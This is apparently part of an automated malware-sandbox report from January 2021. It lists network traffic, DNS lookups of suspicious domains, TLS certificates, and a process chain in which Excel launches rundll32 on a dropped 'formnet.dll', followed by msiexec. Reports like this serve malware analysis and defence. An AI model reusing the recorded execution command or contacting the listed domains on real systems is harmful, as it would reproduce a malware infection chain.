,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 26, 2021 21:35:03.088342905 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.112638950 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.112756014 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.127186060 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.150625944 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.154704094 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.154751062 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.154892921 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.173041105 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.196867943 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.198448896 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.198568106 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.408238888 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.429584026 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577672958 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577702045 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577713013 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577721119 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577733040 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577744961 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577753067 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.577965975 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.578126907 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.578155041 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.578171968 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.578223944 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.578248978 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.579114914 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.579137087 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.579201937 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.579252958 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.579273939 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.579288960 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.579320908 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.579341888 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.594708920 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.612683058 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.612710953 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.612862110 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.637841940 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.637868881 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638022900 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.638091087 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638104916 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638163090 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.638279915 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638297081 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638309956 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638341904 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.638365030 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.638850927 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638870001 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.638881922 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.639028072 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.639769077 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.639789104 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.639806032 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.639851093 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.639873028 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.640710115 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.640728951 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.640743971 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.640779972 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.640801907 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.641004086 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.641535044 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.641555071 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.641571045 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.641594887 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.641614914 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.642400980 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.642419100 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.642432928 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.642462969 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.642482042 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.643237114 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.643320084 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.671866894 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.671895027 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.671912909 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.672084093 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.672089100 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.672147036 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.712064028 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712085009 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712097883 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712105989 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712260962 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.712328911 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712346077 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712363958 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712404013 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.712444067 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.712970972 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.712990999 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.713011026 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.713059902 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.713100910 CET49165443192.168.2.22172.67.150.228
                                                              Jan 26, 2021 21:35:03.713768959 CET44349165172.67.150.228192.168.2.22
                                                              Jan 26, 2021 21:35:03.713788033 CET44349165172.67.150.228192.168.2.22

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 26, 2021 21:35:03.059026003 CET5219753192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:03.075212002 CET53521978.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:35.910082102 CET5309953192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:35.927476883 CET53530998.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:36.971981049 CET5283853192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:36.989037991 CET53528388.8.8.8192.168.2.22
                                                              Jan 26, 2021 21:35:37.533046961 CET6120053192.168.2.228.8.8.8
                                                              Jan 26, 2021 21:35:37.549777031 CET53612008.8.8.8192.168.2.22

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Jan 26, 2021 21:35:03.059026003 CET192.168.2.228.8.8.80x312aStandard query (0)rnollg.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.910082102 CET192.168.2.228.8.8.80x6026Standard query (0)gadgetswolf.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.971981049 CET192.168.2.228.8.8.80xe172Standard query (0)homesoapmolds.comA (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.533046961 CET192.168.2.228.8.8.80x70beStandard query (0)govemedico.tkA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Jan 26, 2021 21:35:03.075212002 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com172.67.150.228A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:03.075212002 CET8.8.8.8192.168.2.220x312aNo error (0)rnollg.com104.21.11.254A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.927476883 CET8.8.8.8192.168.2.220x6026No error (0)gadgetswolf.com172.67.200.147A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:35.927476883 CET8.8.8.8192.168.2.220x6026No error (0)gadgetswolf.com104.21.44.135A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.989037991 CET8.8.8.8192.168.2.220xe172No error (0)homesoapmolds.com104.21.60.169A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:36.989037991 CET8.8.8.8192.168.2.220xe172No error (0)homesoapmolds.com172.67.198.109A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.549777031 CET8.8.8.8192.168.2.220x70beNo error (0)govemedico.tk104.21.73.69A (IP address)IN (0x0001)
                                                              Jan 26, 2021 21:35:37.549777031 CET8.8.8.8192.168.2.220x70beNo error (0)govemedico.tk172.67.158.184A (IP address)IN (0x0001)

                                                              HTTPS Packets

                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                              Jan 26, 2021 21:35:03.154751062 CET172.67.150.228443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:36.030499935 CET172.67.200.147443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:37.038079977 CET104.21.60.169443192.168.2.2249167CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jan 22 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Jan 22 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                              Jan 26, 2021 21:35:37.604994059 CET104.21.73.69443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 14 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 14 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Start time:21:34:38
                                                              Start date:26/01/2021
                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                              Imagebase:0x13fb80000
                                                              File size:27641504 bytes
                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Start time:21:34:43
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\System32\rundll32.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                              Imagebase:0xffc80000
                                                              File size:45568 bytes
                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:21:34:44
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
                                                              Imagebase:0x6a0000
                                                              File size:44544 bytes
                                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Start time:21:35:12
                                                              Start date:26/01/2021
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:msiexec.exe
                                                              Imagebase:0x2a0000
                                                              File size:73216 bytes
                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >